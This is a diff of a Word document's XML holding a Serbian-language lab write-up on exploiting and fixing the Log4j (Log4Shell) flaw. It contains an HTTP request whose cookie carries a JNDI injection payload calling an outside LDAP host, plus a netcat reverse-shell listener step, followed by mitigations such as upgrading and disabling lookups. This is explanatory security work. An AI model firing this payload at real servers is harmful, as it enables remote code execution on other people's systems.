+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+        <w:t>Sec-Fetch-Site: none</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+        <w:t>Sec-Fetch-Mode: navigate</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+        <w:t>Sec-Fetch-User: ?1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+        <w:t>Sec-Fetch-Dest: document</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+        <w:t>Accept-Encoding: gzip, deflate</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+        <w:t>Accept-Language: en-GB,en-US;q=0.9,en;q=0.8</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+        <w:t>Cookie: test='${jndi:ldap://54.243.12.192:1389/0z6aep}'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+        <w:t>Connection: close</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Ovaj request je sastavljen preko </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+        <w:instrText>HYPERLINK "</w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+        <w:instrText>https://portswigger.net/burp</w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+        <w:instrText>"</w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+        <w:t>https://portswigger.net/burp</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> biblioteke</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+        <w:t xml:space="preserve">pre slanja zahteva treba da se otvori reverse shell veza sa </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+        <w:t>komandom:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:ind w:left="720"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>lvp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 8083</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="240" w:after="0"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nakod</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ovoga</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>mo</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ž</w:t>
+      </w:r>
+      <w:r>
+        <w:t>emo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>poslati</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>zahtev</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ranjivoj</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>aplikaciji</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> I </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>na</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>napada</w:t>
+      </w:r>
+      <w:r>
+        <w:t>č</w:t>
+      </w:r>
+      <w:r>
+        <w:t>kom</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>servisu</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> se </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>otvara</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>k</w:t>
+      </w:r>
+      <w:r>
+        <w:t>onekcija</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>. Provera</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> da je </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>uspe</w:t>
+      </w:r>
+      <w:r>
+        <w:t>š</w:t>
+      </w:r>
+      <w:r>
+        <w:t>no</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>povezana</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>na</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ranjivu</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>aplikaciju</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>whoami</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>comandom</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:lang w:val="en"/>
         </w:rPr>
@@ -8209,6 +9742,160 @@
         </w:rPr>
         <w:br/>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>podizanje</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>na</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>verziju</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> u </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>kojoj</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> je problem </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>re</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>š</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>en</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>ver</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>z</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>ija</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 2.17.0 I </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>navi</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>š</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>e</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -8287,62 +9974,568 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:hyperlink r:id="rId15" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>https://www.cvedetails.com/cve/CVE-2023-26031/</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:hyperlink r:id="rId16" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>https://lists.apache.org/thread/q9qpdlv952gb4kphpndd5phvl7fkh71r</w:t>
-        </w:r>
-      </w:hyperlink>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">I </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>na</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>verziji</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>koja</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> je </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>ranjiva</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>moze</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> se </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>uraditi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> fix</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+        <w:t>Ovu ranjivost možete otkriti u tri različite faze životnog ciklusa aplikacije:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="13"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+        <w:t>Tokom izgradnje, pomoću skenera slika.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="13"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+        <w:t>Tokom implementacije, zahvaljujući skeneru slika na kontroleru pristupa.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="13"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+        <w:t>Tokom faze izvršavanja i odgovora, korišćenjem mehanizma za detekciju tokom izvršavanja za otkrivanje zlonamernog ponašanja na već implementiranim hostovima ili podovima.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sr-Latn-RS"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Ili restrikcijom pristupa internetu.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>K</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>oraci</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>su</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Ulogujemo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> se </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>na</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> server </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>kao</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> admin</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Prebacimo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">root </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>privilegije</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>sa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>su</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> –</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Otvorimo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>ect</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/environment I </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>dodamo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>liniju</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> LOG4J_FORMAT_MSG_NO_LOOKUPS=true</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Nakon</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> toga je </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>dovoljno</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> po </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>potrebi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>promeniti</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>prava</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>pristupa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>na</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
